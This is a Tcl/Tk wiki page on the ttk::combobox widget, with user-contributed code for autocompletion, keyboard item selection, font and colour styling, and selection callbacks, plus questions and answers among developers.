authentication and authorization. 2. Use a custom authentication mechanism in the application and use Windows authentication in the service. In this case, specify Forms or None in the Web.config files and allow anonymous access in IIS. Also, use https between the browser and the Web application when collecting credentials in a Web form. 3. Use a custom authentication mechanism in the application and use WSE (WS-Security and WS-Policy) in the service. This methodology resembles the custom methodology above concerning the communication between the browser and the Web application since it still means specifying Forms or None in the Web.config files, allowing anonymous access in IIS, and using https between the browser and the Web application. Where it differs is how it secures the communication between the Web applications and the Web services they use. Now I have to be honest, I’m still working on this one, so I will let you know which method we pick and why. Anyway, I hope you’ve found my tips useful.
http://geekswithblogs.net/SabotsShell/archive/2005/09/13/53617.aspx
CC-MAIN-2020-24
refinedweb
1,160
57.61
Adding image upload functionality to Rich Text EditorJacob Madsen Jan 3, 2019 4:01 PM Hello forum I'm trying to implement image upload functionality to the Rich Text Editor by following the example given in this blog post: The end product will be a documentation management system, where the editing functionality is crucial.My environment: APEX 18.2, ORDS 18.3, Weblogic 12.2.1.3. I have already made the RESTful service to provide the direct image link from the BLOB, as described in the blog article - everything works as described in the blog post. But I'm facing two challenges with the example given: - 1. The submit button in the Image Upload page allows submitting the page, even if the user has not chosen any file, causing a null BLOB to be created. Upload should only be allowed, if the user has actually chosen a file. How can I modify the Submit button, so it takes this into consideration? - 2. Next – again the Submit button in the Image Upload page. When launched, the URL of this page looks like this (in my setup): In the Function and Global Variable Declaration, in the example, a piece of JavaScript is given: function returnFileUrl( pId ) { var funcNum = getUrlParam( 'CKEditorFuncNum' ), // Achtung: hier anpassen! fileUrl = "/ords/bska/apex/apex_bska_001/image/download/" + pId; function getUrlParam( paramName ) { var reParam = new RegExp( '(?:[\?&]|&)' + paramName + '=([^&]+)', 'i' ); var match = window.location.search.match( reParam ); return ( match && match.length > 1 ) ? match[1] : null; } window.opener.CKEDITOR.tools.callFunction( funcNum, fileUrl ); window.close(); } The big problem is, that this JavaScript fails after having submitted this page once, as the URL looks like this after a Submit:::: The getUrlParam fails with this URL, because the reParam returns "CKEditorFuncNum=1", because this is part of the URL. But after doing a Submit, this is no longer part of the URL. For that reason, the getUrlParam function returns null – which means, that you can only return existing images, if you don't upload an image – ie. submit the page. This can hardly be the intention. How do you Submit without altering window.location.search? Thanks in advance 1. Re: Adding image upload functionality to Rich Text EditorCarsten Czarski-Oracle Jan 7, 2019 8:41 AM (in response to Jacob Madsen) Hi Jacob, happy new Year 2019. The answer to your question 1.1 is simple: You can add a Dynamic Action to your upload page as follows: - Create it on Change of the File Browse item - use the item value is NOT NULL condition - As TRUE action, show the button (or enable it), as FALSE action hide the button (or disable it) As a result, end users will not be able to submit the page when no file has been chosen. In addition to that, you might add some code to the tr_pk_editor_images trigger, which raises an error, if the BLOB is empty or NULL. create or replace trigger tr_pk_editor_images before insert on tab_editor_images for each row begin if :new.image is null or sys.dbms_lob.getlength(:new.image) = 0 then raise_application_error(-20000, 'Empty files are not allowed!'); end if; :new.id := seq_editor_images.nextval; :new.uploaded_at := sysdate; :new.uploaded_by := coalesce( v( 'APP_USER' ), sys_context( 'userenv', 'current_user' ) ); end; Regarding your question 1.2, I'm afraid I don't quite get what you mean. Do you, by chance, have a test case for me (e.g. on apex.oracle.com) ...? Thanks and best regards -Carsten 2. Re: Adding image upload functionality to Rich Text EditorJacob Madsen Jan 7, 2019 12:22 PM (in response to Carsten Czarski-Oracle) Hi Carsten Thanks for your answer. Sorry, but I don't understand what you don't understand. Have you tried running your own example, uploaded an image - ie. choose a file, hitting the Submit button and then clicking on one of the images in the list to return the URL to the file dialog in the Rich Text Editor? This doesn't work. - If you open the file upload page and choose an existing file, you get a valid URL back to the Rich Text Editor - However, if you first upload a file, you will get a blank URL back to the Rich Text Editor. This is because your returnFileUrl function checks on whether window.location.search - ie. the URL for the file upload page - changes, once you have hit the Submit button. Your Javascript code checks, if the URL contains "CKEditor", and after hitting the Submit button, this will return false, and the function will return a blank value. Please inspect your returnFileUrl function. Why do you perform this check in your function? var match = window.location.search.match( reParam ); Look at the URL of the file upload page after hitting the Submit button - ie. after you have uploaded a file. The URL changes in the way I already described, causing your returnFileUrl function to fail, as I described. Please try running your example and see, if you can get an URL back to the Rich Text Editor right after uploading an image. Is it clear now? I don't know how else to describe it. I've tried my best to describe it, I thought it was 100% clear. Regarding your solution to my first question. Your solution is not 100% complete. As far as I can see, I need two dynamic actions: - One which disables the button, if the value of the Filename item is NULL. - One which enables the button, if the value of the Filename item is NOT NULL. Otherwise, the button will be enabled as default, and the user can still upload a NULL file. But if I create two Dynamic actions, I can Enable and Disable the button as needed. But can you please tell me, if you understand my second question now? I believe, that if you run your own example, upload a file and then choose a file, you should see the behavior. Thanks in advance! 3. Re: Adding image upload functionality to Rich Text EditorCarsten Czarski-Oracle Jan 7, 2019 12:43 PM (in response to Jacob Madsen) Hi Jacob, let me walk through this step by step - I will come back to you. Regarding your question 1.1: You will need one(!) Dynamic Action. The condition is the Client-Side Condition. Then, as the TRUE action, Show the UPLOAD button. As the False Action, hide the UPLOAD button. Best regards -Carsten 4. Re: Adding image upload functionality to Rich Text EditorCarsten Czarski-Oracle Jan 7, 2019 2:49 PM (in response to Carsten Czarski-Oracle) Hi Jacob, I now have carefully revisited all the steps - and I can see what happens. Thank you very much for making me aware of this. The issue is that the Rich Text Editor (CKEditor) adds some special URL parameters when invoking the Browse Server dialog page - these are needed to correctly pass back the image URL ( ). When you upload a new image, those parameters are lost. I now have updated the blog posting (at the end of the Add an image uploading facility to the Rich Text Editor section) with a few more steps in order to preserve those parameters. Have a look and let me know whether this works for you. I hope this helps Best regards -Carsten 5. Re: Adding image upload functionality to Rich Text EditorJacob Madsen Jan 9, 2019 3:21 PM (in response to Carsten Czarski-Oracle) Hi Carsten. This was exactly the response I was looking for regarding question 2. Thanks! However, I do believe that there is one important thing you forget to mention. Regarding the new hidden item to save the parameters, make sure it's "source" is set to Null. Otherwise you get errors when clicking submit, that "CKEDITOR_PARAMS is not a database item" etc. It took a while for me to figure this one out. But after finally finding the cause of this error, your example works perfectly. I can now finally choose a file I just submitted! Now that I have you. In the same article, you give an example of how to make the CKEditor component responsive. I can't get your example to work. When following your example under "Responsive Rich Text editor", I just get JavaScript errors. The browser console reports this, when the page loads: Uncaught TypeError: apex.da.initDaEventList is not a function at f?p=101:1:85412931328::::::194 at f?p=101:1:85412931328::::::194 at i (desktop_all.min.js?v=18.2.0.00.12:2) at Object.add [as done] (desktop_all.min.js?v=18.2.0.00.12:2) at HTMLDocument.<anonymous> (f?p=101:1:85412931328::::::174) at Object.a.init (desktop_all.min.js?v=18.2.0.00.12:16) at HTMLDocument.<anonymous> (f?p=101:1:85412931328::::::172) at j (desktop_all.min.js?v=18.2.0.00.12:2) at k (desktop_all.min.js?v=18.2.0.00.12:2) My JavaScript initialization code for my CKEditor component looks like this. The name of my CKEditor component is P1_NEW. function ( configObject ) { configObject.uiColor = "#AADC6E"; configObject.resize_enabled = false; configObject.filebrowserBrowseUrl = "f?p=" + $v( "pFlowId" ) + ":2:" + $v( "pInstance" ) + "::" + $v( "pdebug" ); configObject.filebrowserWindowWidth = 640; configObject.width = $( "#P1_NEW" ).closest(".t-Form-inputContainer").width() - 5; configObject.height = 300; // Specify your desired item height, in pixels configObject.resize_dir = 'vertical'; return configObject; } And my Resize event looks like this: CKEDITOR.instances.P1_NEW.resize( $("#P1_NEW" ).closest( ".t-Form-inputContainer" ).width() What's wrong here? Thanks in advance! 6. Re: Adding image upload functionality to Rich Text EditorJacob Madsen Jan 9, 2019 4:40 PM (in response to Jacob Madsen) Carsten, I have found the cause of this error as well. The code in the event is incomplete. I found the error by comparing to Joel Kallman's similar example. In your blog post, you have: CKEDITOR.instances.{PX_item-name}.resize( $("#{PX_item-name}" ).closest( ".t-Form-inputContainer" ).width() But in Joel's example, it is: CKEDITOR.instances.P3_RESUME.resize( $("#P3_RESUME").closest(".t-Form-inputContainer").width() - 5, 300); As you can see, something is clearly cut off in your example. When I use Joel's example, the JavaScript error goes away. But the responsive thing still doesn't work. Resizing the window does nothing. Please help fixing this. Thanks in advance! 7. Re: Adding image upload functionality to Rich Text EditorCarsten Czarski-Oracle Jan 9, 2019 4:47 PM (in response to Jacob Madsen) Hi Jacob, but you are running 18.2, right? So you don't need to apply all that javascript. Just navigate to Shared Components > Component Settings and enable Responsiveness for your Rich Text Editors there. The out-of-the-box funcitionality should also be more complete than custom Javascript. Best regards -Carsten 8. Re: Adding image upload functionality to Rich Text EditorJacob Madsen Jan 10, 2019 12:28 PM (in response to Carsten Czarski-Oracle) Carsten, I can't get this to work. Yes, I'm running 18.2, and I found the setting under Component Settings. It's by default set to Responsive=Yes. But the Rich Text Editor does not resize itself, when the window is resized. Are any extra settings needed? EDIT: It works to some extent. The editor only resizes automatically with this settings, when the window is made larger. Not when it's made smaller. Why is this? This looks like a bug to me. 9. Re: Adding image upload functionality to Rich Text EditorCarsten Czarski-Oracle Jan 10, 2019 2:20 PM (in response to Jacob Madsen) Hi Jacob, hmmm ... are you using the Universal Theme ...? Best regards -Carsten 10. Re: Adding image upload functionality to Rich Text EditorJacob Madsen Jan 10, 2019 4:04 PM (in response to Carsten Czarski-Oracle) Edit Application Properties -> User Interface -> Theme = "Universal Theme - 42" If I hit F5 to refresh after making the window smaller, the Rich Text Editor is adjusted to the correct size. 11. Re: Adding image upload functionality to Rich Text EditorCarsten Czarski-Oracle Jan 10, 2019 4:26 PM (in response to Jacob Madsen) Hi Jacob, the resize stuff should be independent from the rest of your application ... could you provide that as a single page test case on apex.oracle.com ...? Best regards -Carsten 12. Re: Adding image upload functionality to Rich Text EditorJacob Madsen Jan 11, 2019 8:56 AM (in response to Carsten Czarski-Oracle) Hi Carsten. I can't. I don't have an account on apex.oracle.com. I applied for one a long time ago, but nobody ever bothered to respond. Could you eventually help me get this fixed? 13. Re: Adding image upload functionality to Rich Text EditorCarsten Czarski-Oracle Jan 11, 2019 9:33 AM (in response to Jacob Madsen) Hi Jacob, this process is 100% automated. Just make sure to enter a valid email address; after application you should get an email and as soon as you confirm, the workspace should be created ... I would recommend to give it one more try. Let me know whether this works ... Best regards -Carsten 14. Re: Adding image upload functionality to Rich Text EditorJacob Madsen Jan 28, 2019 2:30 PM (in response to Carsten Czarski-Oracle) Hi Carsten. I managed to get an account on apex.oracle.com. I then simply exported the application from my own instance and imported it on my new instance. I can still reproduce the behavior on apex.oracle.com. Making a window smaller does not automatically resize the Rich Text Editor. Shouldn't it? Try for yourself::::::
https://community.oracle.com/thread/4193225
CC-MAIN-2019-13
refinedweb
2,247
67.25
Current Version: Linux Kernel - 3.80 Synopsis #include <sys/quota.h> #include <xfs/xqm.h> int quotactl(int cmd, const char *special, int id, caddr_t addr); Description - Get statistics and other generic information about the quota subsystem. The addr argument should be a pointer to a dqstats structure in which data should be stored. This structure is defined in <sys/quota.h>. The special and id arguments are ignored. This operation is obsolete and not supported by recent kernels. operation requires privilege (CAP_SYS_ADMIN). - Q_XQUOTAOFF - Turn off quotas for an XFS filesystem. As with Q_QUOTAON, XFS filesystems expect a pointer to an unsigned int that specifies whether quota accounting and/or limit enforcement need to be turned off. This operation requires privilege (CAP_SYS_ADMIN). - Q_XGETQUOTA - Get disk quota limits and current usage for user id. The addr argument is a pointer to an fs_disk_quota structure (defined in <xfs/xqm.h>). Unprivileged users may retrieve only their own quotas; a privileged user (CAP_SYS_ADMIN) may retrieve the quotas of any user. - Q_XSETQLIM - Set disk quota limits for user id. The addr argument is a pointer to an fs_disk_quota structure (defined in <xfs/xqm.h>). This operation requires privilege (CAP_SYS_ADMIN). - Q_XGETQSTAT - Returns an fs_quota_stat structure containing XFS filesystem-specific quota information. This is useful for finding out how much space is used that it writes out). Return Value On success, quotactl() returns 0; on error -1 is returned, and errno is set to indicate the error. Errors - EFAULT - addr or special is invalid. - EINVAL - cmd or type is invalid. -. - ESRCH - No disk quota is found for the indicated user. Quotas have not been turned on for this filesystem. If cmd is Q_SETQUOTA, quotactl() may also set errno to: - ERANGE - Specified limits are out of range allowed by quota format. If cmd is Q_QUOTAON, quotactl() may also set errno to: - EACCES - The quota file pointed to by addr exists, but is not a regular file; or, the quota file pointed to by addr exists, but is not on the filesystem pointed to by special. - EBUSY - Q_QUOTAON attempted, but another Q_QUOTAON had already been performed. - EINVAL - The quota file is corrupted. - ESRCH - Specified quota format was not found. See Also Colophon License & Copyright Copyright (c) 2010, Jan Kara A few pieces copyright (c) 1996 Andries Brouwer (aeb@cwi.nl) and copyright 2010
https://community.spiceworks.com/linux/man/2/quotactl
CC-MAIN-2018-34
refinedweb
385
59.8
Welcome to Chapter 4 of the “Implementing a language with LLVM”. Note: the default IRBuilder now always includes the constant folding optimisations below. Our demonstration for Chapter 3 is elegant and easy to extend. Unfortunately, it does not produce wonderful code. For example, when compiling simple code, we don’t get obvious optimizations: ready> def test(x) 1+2+x; Read function definition: define double @test(double %x) { entry: %addtmp = fadd double 1.000000e+00, 2.000000e+00 %addtmp1 = fadd double %addtmp, %x ret double %addtmp1 } This code is a very, very literal transcription of the AST built by parsing the input. As such, this transcription lacks optimizations like constant folding (we’d like to get “add x, 3.0” in the example above) as well as other more important optimizations. Constant folding, in particular, is a very common and very important optimization: so much so that many language implementors implement constant folding support in their AST representation. LLVMFoldingBuilder class does. All we did was switch from LLVMBuilder to LLVMFoldingBuilder. Though we change no other code, we now have all of our instructions implicitly constant folded without us having to do anything about it. For example, the input above now compiles to: ready> def test(x) 1+2+x; Read function definition: define double @test(double %x) { entry: %addtmp = fadd double 3.000000e+00, %x ret double %addtmp } Well, that was easy :). In practice, we recommend always using LLVMFoldingBuilder). On the other hand, the LLVMFoldingBuilder is limited by the fact that it does all of its analysis inline with the code as it is built. If you take a slightly more complex example: ready> def test(x) (1+2+x)*(x+(1+2)); ready> Read function definition: define double @test(double %x) { entry: %addtmp = fadd double 3.000000e+00, %x %addtmp1 = fadd double %x, 3.000000e+00 %multmp = fmul double %addtmp, %addtmp1 ret double %multmp } In this case, the LHS and RHS of the multiplication are the same value. We’d really like to see this generate “tmp = x+3; result = tmp*tmp;” instead of computing “x*3” twice. How to Write a Pass document and the List of LLVM Passes.. In order to get per-function optimizations going, we need to set up a Llvm.PassManager to hold and organize the LLVM optimizations that we want to run. Once we have that, we can add a set of optimizations to run. The code looks like_combining; The meat of the matter here, is the definition of “the_fpm”. It requires a pointer to the the_module “the_execution_engine” variable is related to the JIT, which we will get to in the next section. In this case, we choose to add 4 optimization passes. The passes we chose here are a pretty standard set of “cleanup” optimizations that are useful for a wide variety of code. I won’t delve into what they do but, believe me, they are a good starting place :). Once the Llvm.PassManager. is set up, we need to make use of it. We do this by running it after our newly created function is constructed (in Codegen.codegen_func), but before it is returned to the client: let codegen_func the_fpm = function ... As you can see, this is pretty straightforward. The the_fpm optimizes and updates the LLVM Function* in place, improving (hopefully) its body. With this in place, we can try our test above again: ready> def test(x) (1+2+x)*(x+(1+2)); ready> Read function definition: define double @test(double %x) { entry: %addtmp = fadd double %x, 3.000000e+00 %multmp = fmul double %addtmp, %addtmp ret double %multmp } As expected, we now get our nicely optimized code, saving a floating point add instruction from every execution of this function. LLVM provides a wide variety of optimizations that can be used in certain circumstances. Some documentation about the various passes is available, but it isn’t very complete. Another good source of ideas can come from looking at the passes that Clang runs to get started. The “opt” tool allows you to experiment with passes from the command line, so you can see if they do anything. Now that we have reasonable code coming out of our front-end, lets talk about executing. In order to do this, we first declare and initialize the JIT. This is done by adding a global variable and a call in main: ... let main () = ... (* Create the JIT. *) let the_execution_engine = ExecutionEngine.create Codegen.the_module in ... This creates an abstract “Execution Engine” which can be either a JIT compiler or the LLVM interpreter. LLVM will automatically pick a JIT compiler for you if one is available for your platform, otherwise it will fall back to the interpreter. Once the Llvm_executionengine.ExecutionEngine.t is created, the JIT is ready to be used. There are a variety of APIs that are useful, but the simplest one is the “Llvm_executionengine.ExecutionEngine.run_function” function. This method JIT compiles the specified LLVM Function and returns a function pointer to the generated machine code. In our case, this means that we can change the code that parses a top-level expression to look like ();. With just these two changes, lets see how Kaleidoscope works now! ready> 4+5; define double @""() { entry: ret double 9.000000e+00 } Evaluated to 9.000000 Well this looks like it is basically working. The dump of the function shows the “no argument function that always returns double” that we synthesize for each top level expression that is typed in. This demonstrates very basic functionality, but can we do more? ready> def testfunc(x y) x + y*2; Read function definition: define double @testfunc(double %x, double %y) { entry: %multmp = fmul double %y, 2.000000e+00 %addtmp = fadd double %multmp, %x ret double %addtmp } ready> testfunc(4, 10); define double @""() { entry: %calltmp = call double @testfunc(double 4.000000e+00, double 1.000000e+01) ret double %calltmp } Evaluated to 24.000000 This illustrates that we can now call user code, but there is something a bit subtle going on here. Note that we only invoke the JIT on the anonymous functions that call testfunc, but we never invoked it on testfunc itself. What actually happened here is that the JIT scanned for all non-JIT’d functions transitively called from the anonymous function and compiled all of them before returning from run_function. :) : ready> extern sin(x); Read extern: declare double @sin(double) ready> extern cos(x); Read extern: declare double @cos(double) ready> sin(1.0); Evaluated to 0.841471 ready> def foo(x) sin(x)*sin(x) + cos(x)*cos(x); Read function definition: define double @foo(double %x) { entry: %calltmp = call double @sin(double %x) %multmp = fmul double %calltmp, %calltmp %calltmp2 = call double @cos(double %x) %multmp4 = fmul double %calltmp2, %calltmp2 %addtmp = fadd double %multmp, %multmp4 ret double %addtmp } ready> foo(4.0); Evaluated to 1.000000 “dlsym("sin")” on the Kaleidoscope process itself. Since “sin” is defined within the JIT’s address space, it simply patches up calls in the module to call the libm version of sin directly. The LLVM JIT provides a number of interfaces (look in the llvm_executionengine.mli. One interesting application of this is that we can now extend the language by writing arbitrary C code to implement operations. For example, if we add: /* putchard - putchar that takes a double and returns 0. */ extern "C" double putchard(double X) { putchar((char)X); return 0; } Now we can produce simple output to the console by using things like: “extern putchard(x); putchard(120);”, which prints a lowercase ‘x’ on the console (120 is the ASCII code for ‘x’). Similar code could be used to implement file I/O, console input, and many other capabilities in Kaleidoscope. This completes the JIT and optimizer chapter of the Kaleidoscope tutorial. At this point, we can compile a non-Turing-complete programming language, optimize and JIT compile it in a user-driven way. Next up we’ll look into extending the language with control flow constructs, tackling some interesting LLVM IR issues along the way. Here is the complete code listing for our running example, enhanced with the LLVM JIT and optimizer. To build this example, use: # Compile ocamlbuild toy.byte # Run ./toy.byte Here is the code: <{lexer,parser}.ml>: use_camlp4, pp(camlp4of) <*.{byte,native}>: g++, use_llvm, use_llvm_analysis <*.{byte,native}>: use_llvm_executionengine, use_llvm_target <*.{byte,native}>: use_llvm_scalar_opts, use_bindings"];; (*===----------------------------------------------------------------------=== * Lexer Tokens *===----------------------------------------------------------------------===*) (* The lexer returns these 'Kwd' if it is an unknown character, otherwise one of * these others for known things. *) type token = (* commands *) | Def | Extern (* primary *) | Ident of string | Number of float (* unknown *) | Kwd of char (*===----------------------------------------------------------------------=== * the_fpm = with e -> delete_function the_function; raise e (*===----------------------------------------------------------------------=== * (); with Stream.Error s | Codegen.Error s -> (* Skip token for error recovery. *) Stream.junk stream; print_endline s; end; print_string "ready> "; flush stdout; main_loop the_fpm the_execution_engine stream (*===----------------------------------------------------------------------=== * Main driver code. *===----------------------------------------------------------------------===*) open Llvm open Llvm_executionengine open Llvm_target open Llvm_scalar_opts let main () = ignore (initialize_native_target ()); (*_combination; (* Print out all the generated code. *) dump_module Codegen.the_module ;; main () #include <stdio.h> /* putchard - putchar that takes a double and returns 0. */ extern double putchard(double X) { putchar((char)X); return 0; } Next: Extending the language: control flow
http://www.llvm.org/docs/tutorial/OCamlLangImpl4.html
CC-MAIN-2014-15
refinedweb
1,514
56.55
; char name[30]; int phone_number; }; Declaration of Union Variable We declare the variables of a union in the same way as we declare those of a structure. Again, let's take the same example in which we want to store; char name[30]; int phone_number; }; main() { union student p1, p2, p3; } There is another method of declaring union variables where we declare these at the time of defining the union as follows. union student { int roll_no; char name[30]; int phone_number; }p1, p2, p3; Like structure, we assign the name, roll no and phone number of the first student(suppose p1) by accessing its name, roll_no and phone number as follows. p1.roll_no = 1; Here, p1.roll_no implies roll_no of p1. Always use strcpy to assign a string value to a variable as we assigned the name "Brown" to p1(first student). strcpy(p1.name,"Brown"); Till now, you must have found union similar to structure. Now let's look at the differences between the two. Difference between union and structure Before going into the differences, let's first look at an example. #include <stdio.h> struct student1 { //defining a union int roll_no; char name[40]; int phone_number; }; union student2 { int roll_no; char name[40]; int phone_number; }; int main(){ struct student1 s1; union student2 u1; printf("size of structure = %d\n",sizeof(s1)); printf("size of union = %d\n", sizeof(u members variables at the same time because diiferent memory spaces are occupied by each. Now let's see an example of union. #include <stdio.h> #include <string.h> union student { int roll_no; int phone_number; char name[30]; }; int main() { union student p1; p1.roll_no = 1; p1.phone_number = 1234567822; strcpy(p1.name,"Brown"); printf("roll_no : %d\n", p1.roll_no); printf("phone_number : %d\n", p1.phone_number); printf("name : %s\n", p1.name); return 0; } phone_number : 2003792450 name : Brown As you can see, the name got printed as it is and garbage value got printed as roll number and phone number. Let's see why this happened. As you now know that we can access only one member of union at a time and the other members get corrupted. So, when we wrote p1.roll_no = 1, member 'roll_no' got accessed and got assigned a value <stdio.h> #include <string.h> union student { int roll_no; char name[30]; int phone_number; }; int main() { union student p1; p1.roll_no = 1; printf("roll_no : %d\n", p1.roll_no); strcpy(p1.name,"Brown"); printf("name : %s\n", p1.name); p1.phone_number = 1234567822; printf("phone_number : %d\n", p1.phone_number);.
https://www.codesdope.com/c-union/
CC-MAIN-2021-39
refinedweb
420
66.84
Documentation for ttk::combobox editTtk's combobox widget. Question editActually, this so-called "combobox" is a "drop-down box". Is there a real combobox available, consisting of an entry combined with a listbox? Just like the font chooser in the format/character dialog of LibreOffice - and as opposed to the font chooser in the toolbar of LibreOffice? Wikipedia also gives a good description of it: Ideas for combobox autocompletion editTR - I saw that the combobox of the Tile package didn't support autocompletion, so I added it using the code from BWidget: proc ComboBoxAutoComplete {path key} { # # autocomplete a string in the ttk::combobox from the list of values # # Any key string with more than one character and is not entirely # lower-case is considered a function key and is thus ignored. # # path -> path to the combobox # if {[string length $key] > 1 && [string tolower $key] != $key} {return} set text [string map [list {[} {\[} {]} {\]}] [$path get]] if {[string equal $text ""]} {return} set values [$path cget -values] set x [lsearch $values $text*] if {$x < 0} {return} set index [$path index insert] $path set [lindex $values $x] $path icursor $index $path selection range insert end }All you need to do now, is binding <KeyRelease> to this procedure: package require Tk 8.5 package require tile ttk::combobox .c -values [list one two three four five six seven] pack .c -padx 5 -pady 5 bind .c <KeyRelease> [list ComboBoxAutoComplete .c %K]CLN 2006-04-20 - Shouldn't this be in a namespace or at least be named ttkComboBoxAutoComplete? For that matter, why not submit a patch to get this into the Tile distribution. (Not that I wouldn't be grateful to have it available here in the mean time if I was using Tile.)TR 2006-04-21 - I just read the tile paper [1] by Rolf Ade. It mentions autocompletion code in the demos directory of the tile distribution. I haven't used that code yet, but it seems to do the same job as the code above, just in the correct namespace and as a command like tile::combobox::enableAutocompleteSo, the above code is not needed, really ...Googie Aug 6, 2011 - Note, that at the current moment there's no tile::combobox::enableAutocompleteso the code above makes sense again. Just a small suggestion would be to support case-insensitive autocompletion. To accomplish this with above code just modify the "lsearch" line to look like this: set x [lsearch -nocase $values $text*] Googie Aug 6, 2011 - In addition to autocompletion, the preselection of item from list that is already dropped down using the key for first letter: proc ComboListKeyPressed {w key} { if {[string length $key] > 1 && [string tolower $key] != $key} { return } set cb [winfo parent [winfo toplevel $w]] set text [string map [list {[} {\[} {]} {\]}] $key] if {[string equal $text ""]} { return } set values [$cb cget -values] set x [lsearch -glob -nocase $values $text*] if {$x < 0} { return } set current [$w curselection] if {$current == $x && [string match -nocase $text* [lindex $values [expr {$x+1}]]]} { incr x } $w selection clear 0 end $w selection set $x $w activate $x $w see $x } bind ComboboxListbox <KeyPress> [list ComboListKeyPressed %W %K]To use it, just drop down the list of values in combobox and press letters according to first characters in available values. If there's more than one item starting with pressed key, then next item with matching name is selected for each key press. jnc Feb 5, 2010 - Here is complete auto-complete code. This code completes while in an editable or readonly combobox. It also completes the with a key press when in the drop down list from the combobox. At the bottom is a simple example.jnc Sep 15, 2010 - Updated coded... In a read only widget pressing S will match "Six" and pressing S again will match the next "S" entry which is "Seven" in my example. When no more matches are found, it will start back at the beginning "Six". This is behavior as found in Windows and suggested by MHo. Also bug fixes to some keys such as ' and ".The code is getting large enough it does not belong mixed in which a lot of other code on the page. Please see my Misc Tcl Repository rz Apr 6, 2016 - another autocompletion code attempt. # Combobox enhancement: select item with typing bind ComboboxListbox <KeyPress> { ::ttk::combobox::Autoselect %W %A} bind ComboboxListbox <Key-Delete> { ::ttk::combobox::Autoselect %W {}} bind ComboboxListbox <Key-BackSpace> { ::ttk::combobox::Autoselect %W {}} set ::ttk::combobox::Autoselect {} proc ::ttk::combobox::Autoselect {w key} { variable Autoselect if {$key eq {}} { set Autoselect [string range $Autoselect 0 end-1] } else { append Autoselect $key } if {$Autoselect eq {}} return set myIndex [lsearch -nocase -glob [[::ttk::combobox::LBMaster $w] cget -values] $Autoselect*] if {$myIndex < 0} return $w selection clear 0 end $w activate $myIndex $w selection set $myIndex $w see $myIndex } # Change original procedure to support autocompletion proc ttk::combobox::LBCancel {lb} { Unpost [LBMaster $lb] set ::ttk::combobox::Autoselect {};#RZ } Questions and Suggestions concerning ttk::combobox editRLH It would be nice if a widget is involved to see a graphic showing the widget. Not necessary...but nice. D. McC 2008 Dec 8: OK, after rummaging through the ttk::style man page and trying things out in vain, I give up. Can somebody tell me how to specify the background color for the entry portion of the ttk::combobox? And can somebody tell me why there is not even an option to specify colors of Ttk widgets in the same ultra-simple way as for Tk widgets, e.g., "-bg AntiqueWhite"?Bryan Oakley 2008 Dec 8: To solve your immediate problem, try this: ttk::combobox .cb -style mycombobox.TCombobox ttk::style configure mycombobox.TCombobox -fieldbackground bisque(using "ttk::style map" may be a better choice, but I'll leave that as an exercise for the reader)As to why there is no option, that's the design philosophy of the themed widgets -- you lose some amount of control over individual widgets but gain the ability to create unified themes.MSH This no longer works in 8.6 (tried 8.6.1 8.6.4 8.6.5) the only option which changes is -foreground. D. McC 2008 Dec 9: Thanks--it works! Now I'll see about incorporating that into my color-scheme files.What I still don't understand is why the programmer isn't given a choice about how much control over individual widgets (and ease of configuring them) to trade off for how much ability to create unified themes. TLT 2009-11-28 - I was annoyed that the ttk::combobox does not change the cursor to an ibeam when it is inside the text entry widget. The following binding fixes that: bind TCombobox <Motion> { if {[%W cget -state] eq "normal" && [%W identify %x %y] eq "textarea"} { %W configure -cursor xterm } else { %W configure -cursor "" } } pack [ttk::combobox .cb] MHo: In the read-only-editfield, how is it possible, e.g. to get the entry Seven? Pressing S always leads to Six (prior in the list), pressing S again does not help, pressing E right after S leads to Eight. This is true for the listbox, too.jnc: Feb 24, 2010: In my misc-tcl code project, there is updated combo box code. I have not updated it here yet as I don't want to make daily updates here. The code on the misc-tcl project page allows properly for the Up/Down use of arrow keys to select items when in the readonly edit field. So, to get to Seven, you would press S and then use your up/down arrow key to navigate to Seven. This is how Windows works. I would actually prefer it to allow allow typing of SE which would go to Seven, but this would be non-standard. I am sure you can modify the above code for that type of action if you so desired.MHo: At least within list boxes/tables (like explorer windows) windows navigates to the next matching entry which each keypress. So, the first S would go to Seven, the next S to Six etc.My miscellaneous Tcl code is located at: LV 2010-06-09In the iwidgets combobox, one had the ability to specified a command to execute when one of the menu items in the dropdown list is selected. How does one do that with the ttk version of the combobox?hae 2010-06-09The ttk::combobox does not have this. However here is a basic example to have a callback, when an item is selected. package require tk package require Tk package require Ttk set values [list Orange Apple Peas] set c [ttk::combobox .cbx -values $values] pack $c proc OnComboSelected { w } { puts [info level 0] } bind $c <<ComboboxSelected>> [list OnComboSelected %W]Okay, so I attempted to use the above code. However, I do not get the item selected displayed when I click on an entry. Instead, I get the text: "OnComboSelected .cbx" output.So, when I change OnComboSelected to read proc OnComboSelected { w } { puts [$w get] }I get the selected item output.What a pain for people trying to use ttk from iwidgets! [Leon] - 2010-12-09 15:53:53Salute!Need help! How change size of pop-down items that we have on list? Just need to refer to this list.But how?? Thank you in advance!HaO: There is new info in the font and color box below. Could you check it out. Does it help for you? For me, the question is not clear. Size means x-y size ? Or font size ? Change fonts HaO 2011-04-20 Change the entry font for one Combobox:Disabled/Readonly color (and pointer to color change) font create EntryFont -size 20 ttk::combobox .b -font EntryFontand for all comboboxes: option add *TCombobox.font EntryFontChange the font size for all combobox dropdown listboxes: option add *TCombobox*Listbox.font EntryFont(from the file tcl8.5/lib/tklib/ttk/combobox.tcl) Why is there no -font optionHaO 2015-09-18: I try to answer to the tk ticket [2]: ttk::style -font does not work for TCombobox, TEntry or TSpinbox on either LinuxMint 17.2 or Windows 7. ttk::style -font does work for the other ttk widgets. package require Tk font create x font configure x -size 36 ttk::style configure TCombobox -font x ttk::combobox .c -values [list abc def ghi jkl] pack .c -in .The ttk::combobox is composed of sub-widgets where each has an own style.Lets explore the structure (Windows): % winfo class .c TCombobox % ttk::style layout TCombobox Combobox.border -sticky nswe -children {Combobox.rightdownarrow -side right -sticky ns Combobox.padding -expand 1 -sticky nswe -children {Combobox.focus -expand 1 -sticky nswe -children {Combobox.textarea -sticky nswe}}} % ttk::style element options TCombobox.textarea -font -widthSo the text area has its own -font option. Thats why the upper approach does not style the dropdown box.But I can not find the font for the entry box here. Set the font of the dropdown boxOn the clt thread "changing default font in TCombobox" on 2015-09-21 [3], Brad Lanam gave the following recipe: .combo configure -font myfont ; # the entry font set popdown [ttk::combobox::PopdownWindow .combo] $popdown.f.l configure -font myfont ; # the font for the dropdown listbox Intesting thread 'Propose new layout for ttk::combobox and ttk::spinbox' on clt on 2011-12-04.Enhanced combobox/spinbox layout whith an answer by Pat Thoyts about fixed readonly/disabled colors and a link to a test program: [4]2013-04-15 HaO: Another interesting thread on cltHow to change 